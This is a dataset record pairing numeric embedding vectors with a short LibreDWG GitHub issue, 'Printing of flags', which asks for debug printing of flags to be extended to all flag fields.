-0.006217310205101967, -0.021150028333067894, -0.009984409436583519, -0.007749689277261496, -0.0068438295274972916, -0.0015134242130443454, -0.00856376625597477, 0.02515656128525734, -0.003391985548660159, 0.02480539120733738, -0.0134242819622159, -0.018069306388497353, -0.0003633913875091821, -0.008048982359468937, 0.0011552703799679875, -0.005574828013777733, -0.003882825840264559, -0.020479612052440643, -0.012458563782274723, 0.009050616063177586, 0.0032463297247886658, 0.007486311718821526, -0.01679232344031334, 0.022570671513676643, 0.025539657101035118, 0.00822057668119669, -0.008731369860470295, 0.008428086526691914, 0.01781390979886055, 0.0023225124459713697, -0.003990571480244398, 0.0024043191224336624, 0.015651021152734756, -0.0042938548140227795, 0.014701264910399914, 0.007342651020735502, 0.005263563711196184, 0.018947232514619827, 0.008340293541550636, -0.0003354573855176568, 0.02443825826048851, 0.03565974533557892, 0.027854187414050102, 0.019458025693893433, -0.009800842963159084, 0.01552332192659378, -0.005467082839459181, 0.0035815376322716475, 0.0005871127941645682, -0.014813000336289406, -0.015643039718270302, -0.011923827230930328, -0.007789595052599907, -0.003495740471407771, -0.012394714169204235, 0.005546893924474716, 0.0024342485703527927, -0.009569389745593071, -0.009425729513168335, -0.007091245148330927, 0.013935075141489506, -0.013033205643296242, 0.01677636243402958, 0.016281530261039734, -0.0031944522634148598, 0.015698907896876335, -0.015116283670067787, -0.012043544091284275, 0.007598047610372305, -0.02194814197719097, -0.019649572670459747, 0.00287720188498497, -0.0015653015580028296, 0.002947036875411868, 0.012697997502982616, 0.00671613123267889, -0.0020890641026198864, 0.00008903961861506104, 0.000575639889575541, 0.003645386779680848, 0.004641034174710512, 0.011173599399626255, -0.01063088234513998, 0.0062492345459759235, 0.01620970107614994, 0.007721755653619766, 0.01377545204013586, 0.008875030092895031, -0.009976428002119064, 0.007510255090892315, -0.02268240787088871, -0.015882473438978195, 0.014709245413541794, 0.005590790417045355, -0.007841472513973713, 0.000006262546776270028, 0.00837221834808588, 0.0062492345459759235, -0.012011619284749031, -0.0018007452599704266, -0.018276816233992577, -0.016632700338959694, -0.011213505640625954, 0.0074663590639829636, 0.006636320147663355, 0.029226943850517273, 0.015930360183119774, 0.0017309102695435286, -0.000015058170902193524, -0.014453848823904991, 0.017398890107870102, -0.002162889577448368, -0.012458563782274723, 0.014166528359055519, 0.016888096928596497, 0.0006055691628716886, -0.0023404699750244617, -0.003830948378890753, 0.0023923474363982677, 0.0042619300074875355, 0.0030448059551417828, -0.013671697117388248, -0.014852906577289104, 0.004166156519204378, -0.010144032537937164, 0.001995285740122199, 0.000022337846530717798, 0.0059858569875359535, 0.007131150923669338, 0.0012131336843594909, -0.01554726529866457, 0.019841119647026062, 0.0013587895082309842, -0.0006958558806218207, 0.0046250722371041775, 0.0011263387277722359, -0.0031784900929778814, 0.004668968264013529, 0.00009140902693616226, -0.01846836321055889, -0.005471073091030121, -0.0025679327081888914, 0.02239508554339409, 0.004688921384513378, 0.000571150507312268, -0.022937804460525513, 0.013464187271893024, -0.01397498045116663, -0.005922007840126753, 0.0009447677293792367, 0.00872338842600584, -0.012163260951638222, 0.003076730528846383, -0.01046327780932188, 0.023209162056446075, 0.016345379874110222, -0.018356628715991974, -0.000031550454878015444, 0.02753494121134281, -0.013368413783609867, -0.02790207415819168, 0.0020012715831398964, -0.0043457322753965855, -0.020080555230379105, -0.01187594048678875, 0.00776166096329689, -0.016321437433362007, -0.004964270628988743, 0.0010694731026887894, 0.0022247435990720987, -0.02411901205778122, 0.0031705088913440704, 0.018915308639407158, -0.022522784769535065, 0.0020282077603042126, -0.026449507102370262, -0.0033161647152155638, -0.017223306000232697, 0.016568852588534355, -0.001699983375146985, 0.005766375456005335, -0.006636320147663355, 0.019362252205610275, -0.008970804512500763, 0.00015413582150358707, 0.0035256696864962578, -0.014014886692166328, 0.015714868903160095, -0.022075841203331947, -0.007071292493492365, -0.0037032500840723515, 0.013328508473932743, 0.030615663155913353, 0.007849453948438168, 0.018963195383548737, -0.014038830064237118, 0.002807366894558072, -0.013703621923923492, 0.007043358404189348, -0.017670249566435814, 0.0014485773863270879, -0.015619096346199512, 0.016824249178171158, -0.021517159417271614, -0.008152737282216549, -0.005906045436859131, -0.03518087789416313, 0.003443863010033965, -0.004214043263345957, 0.00043048287625424564, -0.012187204323709011, 0.012354808859527111, -0.00488046882674098, 0.01925051584839821, -0.014134603552520275, 0.0042100525461137295, 0.02099040523171425, 0.004413571674376726, 0.02683260105550289, -0.0005028119776397943, 0.004022495821118355, -0.0035536037757992744, -0.012131337076425552, -0.00627716863527894, 0.011764204129576683, -0.008843106217682362, -0.008364237844944, 0.009290049783885479, -0.01414258498698473, 0.006341017782688141, 0.00019840621098410338, -0.033999666571617126, -0.011660449206829071, -0.021549085155129433, 0.010439334437251091, 0.011836034245789051, 0.002328498288989067, -0.007270820904523134, -0.015092340297996998, -0.00026986238663084805, -0.015108303166925907, -0.018085269257426262, -0.022171614691615105, 0.010215862654149532, -0.022826068103313446, 0.0032503202091902494, 0.004333760589361191, -0.004082354251295328, 0.024949051439762115, -0.010072201490402222, 0.0026257960125803947, -0.013496112078428268, -0.040639977902173996, 0.0029969189781695604, 0.020096516236662865, 0.008970804512500763, 0.003583532990887761, -0.009146389551460743, -0.002256668172776699, -0.013152922503650188, 0.005702526308596134, 0.008420105092227459, -0.02542792074382305, -0.03658555820584297, 0.016161814332008362, 0.012674054130911827, 0.009489578194916248, 0.01411864161491394, 0.02308146469295025, 0.0004980731755495071, 0.0057943095453083515, -0.009425729513168335, 0.005355346482247114, -0.005826233886182308, 0.022474898025393486, 0.0034578300546854734, -0.009705069474875927, 0.014964642003178596, -0.016520965844392776, 0.012147299014031887, 0.011548712849617004, 0.0009258125210180879, -0.032275740057229996, 0.013368413783609867, 0.008523860014975071, 0.025411957874894142, -0.00592599855735898, 0.0040663923136889935, 0.012171242386102676, 0.019426101818680763, -0.008292406797409058, -0.020431725308299065, -0.009992390871047974, 0.022458935156464577, 0.009178314357995987, -0.00305278692394495, 0.005259572993963957, 0.0011572656221687794, -0.0028313102666288614, 0.007913302630186081, 0.036138612776994705, 0.007709783501923084, -0.01272992230951786, 0.0057424320839345455, -0.010024314746260643, 0.00017733100685290992, 0.016728475689888, 0.008144755847752094, -0.008922917768359184, -0.0007921283831819892, 0.0050640348345041275, 0.006209328770637512, -0.01636134274303913, -0.0057783471420407295, 0.0028612397145479918, -0.008699445053935051, 0.0031146409455686808, -0.007115188520401716, -0.0081966333091259, 0.0008943867869675159, -0.003148560645058751, 0.004465449135750532, 0.012346827425062656, -0.007721755653619766, 0.015810644254088402, 0.01952187530696392, -0.01255433727055788, -0.013559960760176182, 0.0019703444559127092, -0.007438424974679947, -0.02482135407626629, -0.0008634598343633115, -0.002152913250029087, -0.020766932517290115, -0.021213876083493233, -0.012123355641961098, 0.007330679334700108, 0.00769382156431675, 0.00960929598659277, 0.004501364193856716, -0.03133396431803703, -0.001595230889506638, 0.023847654461860657, 0.013089073821902275, 0.0002805870317388326, -0.0065126121044158936, 0.004900421481579542, -0.007949218153953552, -0.005806281231343746, 0.013512074016034603, -0.007278801873326302, -0.009513521566987038, -0.0041581750847399235, -0.0024342485703527927, -0.013783433474600315, -0.010862334631383419, -0.014310188591480255, -0.010918202809989452, 0.0050999498926103115, -0.012450582347810268, 0.0014066763687878847, -0.013767470605671406, 0.041023071855306625, 0.0040085287764668465, 0.023576295003294945, 0.005798300262540579, 0.0072069717571139336, 0.012450582347810268, -0.0064766970463097095, 0.0092421630397439, 0.013017243705689907, 0.025890827178955078, -0.001028569764457643, -0.023496484383940697, 0.007969170808792114, -0.0213256124407053, 0.007494292687624693, -0.0016032119747251272, 0.017382929101586342, -0.014437886886298656, 0.011245429515838623, 0.0013029215624555945, 0.0042938548140227795, 0.00331217423081398, -0.0050281197763979435, 0.0092421630397439, -0.0038668636698275805, -0.011189562268555164, 0.008292406797409058, -0.0012410676572471857, -0.0045572323724627495, 0.00979286152869463, -0.007709783501923084, -0.013631791807711124, 0.01170035544782877, 0.005802290514111519, 0.007897340692579746, -0.010535107925534248, -0.017287155613303185, -0.01995285600423813, -0.014717226848006248, -0.01013605110347271, 0.013456206768751144, -0.006348998751491308, 0.015898436307907104, -0.008188651874661446, -0.010207881219685078, 0.01011210773140192, 0.02376784197986126, 0.010271730832755566, 0.013982961885631084, 0.005036100745201111, 0.012785790488123894, 0.009521503001451492, 0.010495202615857124, 0.0016949950950220227, -0.007677859161049128, 0.015068396925926208, -0.013328508473932743, 0.016002191230654716, -0.0006764018326066434, 0.012634148821234703, 0.0044854022562503815, 0.010335579514503479, 0.00531943142414093, 0.02065519616007805, -0.017175419256091118, -0.02649739384651184, -0.009952484630048275, -0.013959018513560295, -0.010495202615857124, 0.021804481744766235, -0.008212595246732235, 0.0042100525461137295, 0.0022027953527867794, -0.0037810662761330605, 0.013839301653206348, 0.0005097954999655485, 0.018612025305628777, -0.007901331409811974, -0.0027135885320603848, -0.0060736495070159435, -0.0057783471420407295, 0.02895558439195156, 0.004080359358340502, 0.013679678551852703, -0.006827867589890957, 0.0014535655500367284, 0.019793232902884483, -0.02162889577448368, -0.005487035494297743, -0.00010063721856568009, 0.022091802209615707, -0.007566123269498348, -0.015411586500704288, 0.009377842769026756, 0.0341273657977581, -0.011987675912678242, 0.015802662819623947, -0.004309816751629114, 0.009521503001451492, 0.012977337464690208, 0.022251425310969353, 0.014437886886298656, -0.00618937611579895, 0.007797576487064362, 0.009202257730066776, -0.028444791212677956, -0.001761837163940072, -0.011397071182727814, 0.006636320147663355, 0.017542552202939987, 0.00812879391014576, -0.010606938041746616, -0.0022167623974382877, -0.005682573653757572, 0.013456206768751144, -0.0040663923136889935, -0.01081444788724184, 0.010766561143100262, -0.012833677232265472, 0.0018406510353088379, 0.014166528359055519, 0.016999833285808563, -0.02263452112674713, -0.017574476078152657, -0.0013637777883559465, 0.01517215184867382, -0.0013587895082309842, -0.008763294667005539, -0.0009273089817725122, 0.012737903743982315, 0.00470887403935194, 0.006428810302168131, 0.015036472119390965, -0.017989495769143105, -0.009234181605279446, 0.006604395341128111, -0.020160365849733353, 0.010447315871715546, -0.016967909410595894, 0.0026297864969819784, -0.0004970755544491112, -0.02303357794880867, 0.006724112667143345, -0.0042260149493813515, -0.010766561143100262, 0.02483731508255005, 0.002014240948483348, -0.0042419773526489735, 0.014382018707692623, -0.02273029461503029, 0.005455111153423786, -0.009146389551460743, 0.0026257960125803947, -0.00488046882674098, 0.0023644135799258947, -0.001368765952065587, -0.0015912402886897326, -0.01645711623132229, -0.0033281364012509584, -0.013520055450499058, -0.0026896449271589518, 0.011149656027555466, -0.023496484383940697, -0.0008060953696258366, 0.008619633503258228, 0.0028791972436010838, 0.009154370054602623, 0.008324331603944302, -0.0013737541157752275, -0.0009756946819834411, 0.02935464307665825, 0.008292406797409058, 0.010080182924866676, -0.0017728112870827317, -0.011421014554798603, 0.003505716798827052, -0.029099246487021446, -0.0044175623916089535, -0.006049706134945154, -0.0009951486717909575, -0.023496484383940697, -0.000020436089471331798, 0.001080447225831449, -0.015236001461744308, 0.005303469020873308, 0.014741170220077038, -0.007294764276593924, 0.008204614743590355, 0.006436791270971298, 0.012011619284749031, -0.009968447498977184, -0.0054830447770655155, -0.0007123169489204884, -0.0027614752762019634, 0.00944169145077467, 0.01640922948718071, 0.0012540370225906372, -0.02790207415819168, 0.004493383225053549, 0.0058661396615207195, 0.011373127810657024, -0.0163932666182518, 0.007159085012972355, 0.008080907166004181, -0.001020588562823832, -0.0004616592195816338, -0.007769642397761345, -0.006516602821648121, -0.01920262910425663, -0.0057623847387731075, -0.000346431479556486, -0.0006040727021172643, 0.013296583667397499, -0.010335579514503479, -0.007570113521069288, -0.015036472119390965, -0.028540566563606262, 0.0022626540157943964, -0.020479612052440643, 0.016305474564433098, -0.017686212435364723, -0.007653915788978338, -0.004668968264013529, 0.013791413977742195, -0.022889917716383934, 0.02751898020505905, -0.013687659054994583, -0.006640310399234295, 0.02089463174343109, 0.017638325691223145, 0.02062327228486538, -0.0025140598881989717, 0.006971527822315693, -0.01554726529866457, 0.03142973780632019, -0.005195723846554756, 0.0002576412516646087, 0.0035775471478700638, -0.011891902424395084, -0.012538375332951546, -0.0068597919307649136, 0.03139781579375267, -0.014773095026612282, -0.026337770745158195, 0.010415391065180302, -0.003713226644322276, 0.007278801873326302, 0.010734636336565018, 0.014733188785612583, -0.007230915129184723, 0.01776602305471897, -0.012370770797133446, 0.00023157784016802907, 0.004525308031588793, 0.012873582541942596, -0.007250867784023285, 0.006939603481441736, 0.018915308639407158, 0.0013827329967170954, -0.0032323626801371574, 0.010854354128241539, 0.029035396873950958, -0.007717764936387539, 0.0031884664203971624, -0.001919464790262282, -0.027423206716775894, 0.003769094590097666, 0.023273011669516563, 0.022490859031677246, 0.0019553799647837877, -0.014828963205218315, -0.018388552591204643, 0.0021509178914129734, -0.0029151123017072678, 0.013184847310185432, -0.03387196734547615, 0.004912393167614937, -0.005076006520539522, -0.006065668538212776, -0.020016705617308617, 0.020846744999289513, 0.014828963205218315, -0.010207881219685078, 0.02895558439195156, 0.0064048669300973415, -0.013176866807043552, 0.015076378360390663, 0.001892528380267322, 0.002833305625244975, -0.00043746636947616935, -0.011716317385435104, 0.01990496926009655, 0.026034487411379814, 0.022826068103313446, 0.002729550702497363, -0.009361879900097847, 0.009729012846946716, -0.012793771922588348, 0.014629433862864971, -0.013575923629105091, -0.0019783256575465202, 0.006237262859940529, 0.010934165678918362, 0.027407243847846985, 0.008643577806651592, 0.005694545339792967, -0.03955454379320145, -0.0040863449685275555, 0.00706331105902791, -0.019473988562822342, -0.013982961885631084, 0.016345379874110222, 0.0004337252175901085, -0.012322884052991867, -0.0002858246734831482, -0.011740260757505894, 0.01222711056470871, 0.0314457006752491, -0.019027043133974075, 0.021006368100643158, -0.01604209654033184, 0.010942146182060242, -0.0034019621089100838, -0.0025419939775019884, -0.003777075791731477, 0.014884830452501774, -0.019043006002902985, 0.0006659266073256731, -0.021581009030342102, 0.007598047610372305, 0.02022421546280384, -0.017335042357444763, 0.001683023408986628, -0.018324702978134155, 0.013176866807043552, 0.0010505178943276405, 0.025747165083885193, 0.029179057106375694, -0.011923827230930328, -0.01645711623132229, -0.01533975638449192, -0.0011123717995360494, 0.013344470411539078, 0.02510867454111576, 0.0019653562922030687, -0.02229931205511093, 0.011277354322373867, -0.0018077287822961807, 0.008025038987398148, -0.0030567776411771774, 0.006293131038546562, 0.024980975314974785, 0.023544371128082275, -0.012418657541275024, -0.0030847114976495504, 0.01749466359615326, -0.0008055965881794691, -0.010447315871715546, 0.011413034051656723, 0.008771276101469994, 0.007047348655760288, 0.03773484379053116, -0.004804647993296385, -0.009673144668340683, 0.012761847116053104, 0.0066842068918049335, 0.017750060185790062, -0.007358613424003124, 0.005040091462433338, -0.010998014360666275, -0.015475435182452202, -0.0018965189810842276, 0.013001280836760998, 0.013033205643296242, 0.015164170414209366, 0.006608386058360338, -0.016824249178171158, -0.0017468725563958287, 0.027758413925766945, 0.02822132036089897, 0.006137498654425144, 0.03288230672478676, -0.015228020027279854, -0.014565585181117058, -0.014421924948692322, -0.01608998328447342, -0.0060058096423745155, 0.001725922105833888, 0.007366594392806292, 0.013472168706357479, -0.008180671371519566, -0.008946861140429974, 0.007737717591226101, -0.01782987266778946, -0.032355550676584244, 0.008444048464298248, 0.0008509893086738884, 0.003787052119150758, -0.006293131038546562, -0.0044015999883413315, -0.028732113540172577, 0.0040145148523151875, 0.003856887109577656, -0.0791090875864029, 0.009210238233208656, 0.004900421481579542, -0.0057424320839345455, 0.008611653000116348, -0.005467082839459181, 0.01431817002594471, 0.0057105072773993015, -0.00610158359631896, 0.0049922047182917595, -0.005487035494297743, -0.00479267630726099, 0.0051837521605193615, -0.0034498488530516624, 0.008843106217682362, 0.003739165375009179, 0.004700893070548773, 0.006297121290117502, -0.0040085287764668465, 0.013671697117388248, 0.021373499184846878, -0.014382018707692623, -0.015204076655209064, 0.01328062079846859, -0.003120626788586378, -0.0021309650037437677, 0.004513336345553398, -0.009920559823513031, -0.02060730941593647, -0.018771646544337273, 0.001751860836520791, 0.015379661694169044, 0.010670787654817104, 0.020511535927653313, 0.005187742877751589, -0.02271433174610138, -0.02095847949385643, -0.015427548438310623, 0.011460920795798302, 0.0008879021042957902, 0.007374575827270746, -0.006009800359606743, -0.011117731221020222, -0.012043544091284275, -0.005650648847222328, -0.015076378360390663, 0.0006335031939670444, 0.029131170362234116, -0.011285335756838322, 0.004525308031588793, -0.0043976097367703915, 0.005004176404327154, 0.01098205242305994, 0.0017279173480346799, -0.0023165266029536724, 0.0092421630397439, 0.015236001461744308, -0.008659539744257927, -0.005275535397231579, -0.029817549511790276, -0.007554151583462954, 0.009744974784553051, 0.0006250232108868659, -0.009736994281411171, 0.007969170808792114, 0.018931269645690918, 0.01344822533428669, 0.013831320218741894, 0.008691464550793171, -0.018915308639407158, -0.0010704707819968462, -0.01327264029532671, -0.012099412269890308, 0.0032622921280562878, -0.00018194511358160526, 0.0053752996027469635, -0.009896616451442242, -0.003914750646799803, 0.013136960566043854, 0.004134231712669134, 0.007226924411952496, -0.008005086332559586, 0.012011619284749031, -0.0011173599632456899, -0.012290959246456623, 0.009321974590420723, 0.006620357744395733, 0.0016091978177428246, -0.0007567121065221727, -0.005155818071216345, 0.012801752425730228, 0.00960929598659277, -0.012913488782942295, 0.04577983543276787, 0.025986600667238235, -0.008009076118469238, -0.014637415297329426, -0.0035715613048523664, -0.014134603552520275, 0.004090335685759783, -0.013871225528419018, 0.0033361176028847694, -0.004405590705573559, 0.023831691592931747, 0.008172689937055111, 0.0014236363349482417, -0.017957570031285286, -0.02065519616007805, 0.01275386568158865, 0.007625981699675322, 0.007202981039881706, -0.005522950552403927, 0.006444772705435753, 0.008037010207772255, 0.010383466258645058, -0.008340293541550636, 0.0013587895082309842, 0.004289864096790552, -0.0049602799117565155, 0.007717764936387539, -0.0069994619116187096, -0.03166917338967323, -0.0050999498926103115, 0.003569565946236253, -0.0013009262038394809, -0.004413571674376726, 0.006987490225583315, 0.016664626076817513, 0.0007168063893914223, -0.014382018707692623, 0.010231824591755867, 0.005159808788448572, 0.0064926594495773315, 0.006556508596986532, 0.011325241066515446, -0.008467991836369038, 0.02961003966629505, -0.014366056770086288, 0.009218219667673111, -0.013168885372579098, -0.01135716587305069, -0.0040444438345730305, 0.0049602799117565155, 0.004004538059234619, -0.01712753251194954, 0.00014390997239388525, -0.007526217494159937, 0.026002561673521996, 0.01985708251595497, -0.0007422462804242969, -0.003888811683282256, -0.009393804706633091, -0.0019404152408242226, 0.010598957538604736, 0.013456206768751144, 0.03238747641444206, 0.018995119258761406, 0.008172689937055111, -0.016951946541666985, -0.002677673241123557, -0.012530393898487091, 0.015156189911067486, -0.0018885378958657384, -0.003723202971741557, -0.012410677038133144, 0.0016091978177428246, -0.010598957538604736, 0.0042419773526489735, -0.01188392098993063, 0.0013128980062901974, 0.01013605110347271, 0.026992224156856537, 0.011692374013364315, 0.011101769283413887, 0.02996120974421501, -0.012642130255699158, -0.011764204129576683, -0.0059020547196269035, -0.003769094590097666, -0.0024222766514867544, 0.0017039739759638906, 0.006293131038546562, -0.01379939541220665, -0.020160365849733353, -0.010120089165866375, -0.0066283387131989, 0.012969356961548328, -0.008755313232541084, 0.003244334366172552, 0.0007337662973441184, 0.026816638186573982, 0.02900347113609314, -0.0027255602180957794, -0.0008474975475110114, -0.0019843115005642176, 0.003826957894489169, -0.002649739384651184, 0.018404515460133553, -0.011836034245789051, -0.014797038398683071, 0.008779256604611874, 0.007582085207104683, 0.008635596372187138, 0.027056073769927025, -0.003583532990887761, -0.024342484772205353, 0.008404143154621124, 0.005331403110176325, -0.006157451309263706, 0.008475973270833492, 0.010000371374189854, 0.00793724600225687, -0.01414258498698473, -0.010064220987260342, 0.007801566738635302, -0.010080182924866676, -0.01786179654300213, 0.030775286257267, -0.007023405283689499, 0.013009262271225452, 0.023863615468144417, -0.008683483116328716, 0.016153832897543907, -0.0065285745076835155, -0.010375485755503178, 0.001971342135220766, 0.017957570031285286, 0.01642519049346447, 0.017574476078152657, 0.011061863973736763, 0.012123355641961098, 0.013328508473932743, 0.025364071130752563, 0.019968818873167038, 0.0041541848331689835, -0.003076730528846383, 0.011780166067183018, 0.021724669262766838, 0.005207695532590151, -0.0033081835135817528, 0.011245429515838623, -0.007230915129184723, -0.021485235542058945, -0.007637953385710716, -0.008835124783217907, 0.008731369860470295, 0.03066354990005493, 0.02756686694920063, 0.010934165678918362, -0.03489355370402336, 0.002651734510436654, -0.009904597885906696, -0.019027043133974075, 0.019489949569106102, 0.0044375150464475155, 0.00024205309455282986, -0.0008659539744257927, -0.007374575827270746, 0.010950127616524696, -0.011692374013364315, -0.008555784821510315, 0.0050081671215593815, 0.03661748021841049, 0.0004569204174913466, -0.009952484630048275, -0.003964632749557495, 0.010016334243118763, -0.03256306052207947, -0.005574828013777733, -0.006552517879754305, 0.015243981964886189, 0.004222024232149124, -0.02196410484611988, -0.012690016999840736, 0.0033959762658923864, -0.017702173441648483, -0.013176866807043552, 0.013520055450499058, -0.005502997897565365, -0.02376784197986126, -0.010088164359331131, -0.016552889719605446, -0.012650110758841038, -0.006153461057692766, 0.01816507987678051, -0.0006559501634910703, -0.027790337800979614, -0.009321974590420723, -0.015643039718270302, 0.024853277951478958, -0.003896792884916067, -0.0019593704491853714, -0.005682573653757572, -0.029083283618092537, -0.025348108261823654, 0.0028353009838610888, 0.0069475844502449036, 0.026241997256875038, 0.010255767963826656, 0.014342113398015499, -0.011444958858191967, -0.012482507154345512, -0.010535107925534248, -0.00006565736839547753, 0.0008634598343633115, -0.005878111347556114, 0.004601128865033388, -0.003643391653895378, 0.0010036287130787969, -0.020080555230379105, 0.02370399422943592, -0.0030268484260886908, 0.013639772310853004, -0.004409581422805786, 0.016616739332675934, 0.02761475369334221, 0.01610594615340233, -0.005993837956339121, -0.007458377629518509, -0.0057224794290959835, -0.00014640408335253596, -0.0038848211988806725, -0.01292945072054863, -0.008009076118469238, -0.007637953385710716, 0.025667354464530945, 0.01781390979886055, -0.010942146182060242, 0.0226664450019598, 0.0046769496984779835, 0.005634686443954706, 0.02164485864341259, -0.013176866807043552, -0.00470887403935194, -0.020687121897935867, 0.004656996577978134, -0.00023856133338995278, -0.0028911689296364784, -0.02273029461503029, 0.006121536251157522, -0.0020970453042536974, -0.00032997035305015743, 0.003679306712001562, 0.02134157530963421, 0.009489578194916248, -0.0044175623916089535, 0.01744677685201168, 0.0013049168046563864, 0.0021429366897791624, -0.0037371700163930655, -0.029035396873950958, 0.01585853099822998, 0.0014316174201667309, 0.009856711141765118, 0.011341203935444355, 0.010766561143100262, 0.013871225528419018, -0.007821519859135151, 0.008204614743590355, 0.023273011669516563, 0.0056546395644545555, -0.02791803702712059, -0.0026098336093127728, -0.0289396233856678, -0.0063889045268297195, 0.014358075335621834, 0.00978488102555275, 0.007530208211392164, 0.0028273197822272778, 0.009034653194248676, 0.012977337464690208, 0.0007751684752292931, 0.02895558439195156, 0.07923678308725357, -0.010167975910007954, 0.008771276101469994, 0.001716943341307342, -0.0015463463496416807, -0.018308740109205246, -0.012322884052991867, 0.05123893544077873, -0.007618000730872154, 0.03447853401303291, -0.010670787654817104, 0.000042275114537915215, -0.022442972287535667, -0.014757132157683372, -0.019777271896600723, 0.004756760783493519, 0.03728789836168289, -0.01590641774237156, 0.003777075791731477, 0.0005686564254574478, -0.005371308885514736, 0.007618000730872154, 0.01115763746201992, 0.0066482918336987495, 0.017941609025001526, -0.008188651874661446, -0.0026796685997396708, -0.017909683287143707, 0.001918467110954225, 0.019122818484902382, -0.016680587083101273, -0.006652282550930977, -0.012259035371243954, 0.00027809294988401234, 0.007294764276593924, -0.0042419773526489735, -0.0035675708204507828, 0.033329252153635025, -0.0013697636313736439, 0.0025180503726005554, 0.017925646156072617, -0.0074663590639829636, 0.001220117206685245, -0.0076100192964077, 0.022873954847455025, -0.0003938195004593581, -0.017351003363728523, -0.008587709628045559, 0.00042524526361376047, -0.005734451115131378, 0.0011542727006599307, 0.00122111476957798, 0.002468168269842863, -0.004146203398704529, 0.02649739384651184, -0.015419567003846169, -0.0023684040643274784, 0.009673144668340683, 0.014805019833147526, -0.007853444665670395, 0.007139131892472506, 0.009505541063845158, 0.004321788903325796, -0.011405052617192268, -0.02723165787756443, -0.010343560948967934, -0.006636320147663355, -0.005171780474483967, -0.01749466359615326, 0.0032124097924679518, -0.00653655594214797, -0.00645275367423892, -0.016600776463747025, -0.013639772310853004, -0.016920022666454315, 0.018643949180841446, 0.004892440512776375, -0.0037990238051861525, -0.007641944102942944, -0.0021130074746906757, 0.005834215320646763, 0.015028491616249084, -0.018963195383548737, -0.0017758042085915804, 0.01889934577047825, 0.017366966232657433, -0.021118102595210075, 0.0007771637756377459, -0.02161293476819992, 0.020112479105591774, 0.010710692964494228, 0.0056187245063483715, -0.02201199159026146, 0.010048258118331432, 0.0034558346960693598, -0.01150880753993988, 0.02097444236278534, -0.00047363093472085893, 0.010503184050321579, -0.0054990071803331375, 0.004804647993296385, 0.018947232514619827, 0.004321788903325796, -0.013982961885631084, 0.007574104238301516, 0.008667521178722382, 0.016305474564433098, 0.013935075141489506, -0.003669330384582281, -0.01645711623132229, 0.005171780474483967, 0.005367318168282509, -0.0027255602180957794, 0.0001252041693078354, 0.010439334437251091, -0.024693654850125313, 0.005826233886182308, -0.0012450582580640912, 0.0003090198733843863, -0.00734664173796773, -0.004253949038684368, -0.0012011619983240962, 0.004601128865033388, 0.009952484630048275, 0.006468716077506542, 0.008906954899430275, 0.006919650826603174, -0.004529298283159733, -0.002729550702497363, 0.003617452923208475, -0.0005945950979366899, 0.00976093765348196, 0.01517215184867382, 0.005981866270303726, 0.010974070988595486, -0.01080646738409996, -0.01637730374932289, 0.008906954899430275, 0.00050131551688537, 0.0362982377409935, 0.015419567003846169, -0.008683483116328716, 0.008236539550125599, 0.009361879900097847, -0.003268277971073985, 0.019027043133974075, 0.0029709802474826574, 0.005487035494297743, 0.02263452112674713, -0.003531655529513955, -0.0068558016791939735, 0.008420105092227459, 0.02198006585240364, -0.004812628962099552, -0.0005242613260634243, -0.012745884247124195, -0.0283490177243948, 0.005894073750823736, 0.01781390979886055, 0.0049203746020793915, -0.01636134274303913, -0.011397071182727814, 0.006604395341128111, 0.017718136310577393, 0.026050448417663574, 0.0226664450019598, 0.008859068155288696, -0.007550160866230726, 0.0017109573818743229, 0.0007547168061137199, 0.01031163614243269, 0.024980975314974785, 0.0029749709647148848, 0.0013976976042613387, 0.008659539744257927, 0.004377656616270542, 0.00723490584641695, -0.019713422283530235, -0.01627354882657528, 0.005702526308596134, -0.0062851496040821075, 0.011995657347142696, 0.010622900910675526, 0.043864358216524124, -0.01644115336239338, 0.01464539673179388, 0.01706368289887905, -0.0016341389855369925, -0.004844553302973509, 0.01810123212635517, -0.0039307125844061375, 0.03534049913287163, -0.01746273972094059, -0.018244892358779907, 0.006592423655092716, 0.013751508668065071, 0.00857174675911665, -0.013895168900489807, -0.01533975638449192, -0.013815357349812984, 0.005770366173237562, 0.009976428002119064, 0.0050600445829331875, 0.0042260149493813515, 0.005083987955003977, 0.03693672642111778, 0.010319617576897144, 0.01627354882657528, 0.009178314357995987, 0.014709245413541794, 0.014038830064237118 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Hi @rurban, You are creating nice flags printing (https://github.com/LibreDWG/libredwg/commit/4a52199ea72b9a47ff21abc14f8b2485fdd101cd) Could we add this kind of logging to all flags?
Printing of flags
https://api.github.com/repos/LibreDWG/libredwg/issues/469/comments
3
2022-05-12T15:20:10
2023-01-03T09:25:57Z
https://github.com/LibreDWG/libredwg/issues/469
1,234,145,842
469
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Printing of flags Issue date: --- start body --- Hi @rurban, You are creating nice flags printing (https://github.com/LibreDWG/libredwg/commit/4a52199ea72b9a47ff21abc14f8b2485fdd101cd) Could we add this kind of logging to all flags? --- end body ---
315
[ -0.010356978513300419, 0.0029028011485934258, -0.013496389612555504, 0.012926986441016197, 0.041551027446985245, 0.0054901218973100185, 0.005517053417861462, 0.06235732138156891, -0.018220895901322365, 0.01395037304610014, -0.021914320066571236, -0.013842648826539516, 0.012242164462804794, 0.011911295354366302, -0.023222409188747406, 0.034964419901371, -0.0065789129585027695, 0.007090606261044741, -0.03144028037786484, -0.006544287316501141, 0.008002420887351036, 0.025423074141144753, -0.0019948340486735106, -0.0012946223141625524, 0.0072483462281525135, 0.003162495093420148, -0.019929105415940285, 0.001953475410118699, -0.037211254239082336, 0.02280689775943756, 0.028516316786408424, 0.034748971462249756, -0.012911597266793251, 0.0042820642702281475, 0.031855788081884384, -0.0038049970753490925, 0.04302839934825897, 0.0778697058558464, -0.000052660157962236553, 0.025930920615792274, -0.0248382817953825, -0.05035369098186493, 0.012934681959450245, 0.00002601447886263486, -0.04081234335899353, 0.006998270750045776, -0.00891808234155178, 0.027885356917977333, -0.039088744670152664, -0.02591553144156933, 0.017574546858668327, -0.0325944758951664, -0.01368875615298748, -0.02674655057489872, 0.0002102799480780959, -0.020975574851036072, 0.003974278923124075, 0.0028450912795960903, 0.001998681342229247, 0.0032625251915305853, -0.002675809431821108, 0.028070028871297836, 0.008833440952003002, 0.012634591199457645, 0.02948584221303463, 0.0060402886010706425, -0.026885055005550385, -0.010018414817750454, 0.025638524442911148, -0.015735529363155365, 0.03330238163471222, 0.027639128267765045, 0.05241585522890091, 0.01855945959687233, -0.0006170135457068682, 0.001891918363980949, 0.04909177124500275, -0.014866034500300884, -0.03782682493329048, -0.0016755068209022284, 0.015489300712943077, 0.0026623436715453863, -0.03477974981069565, 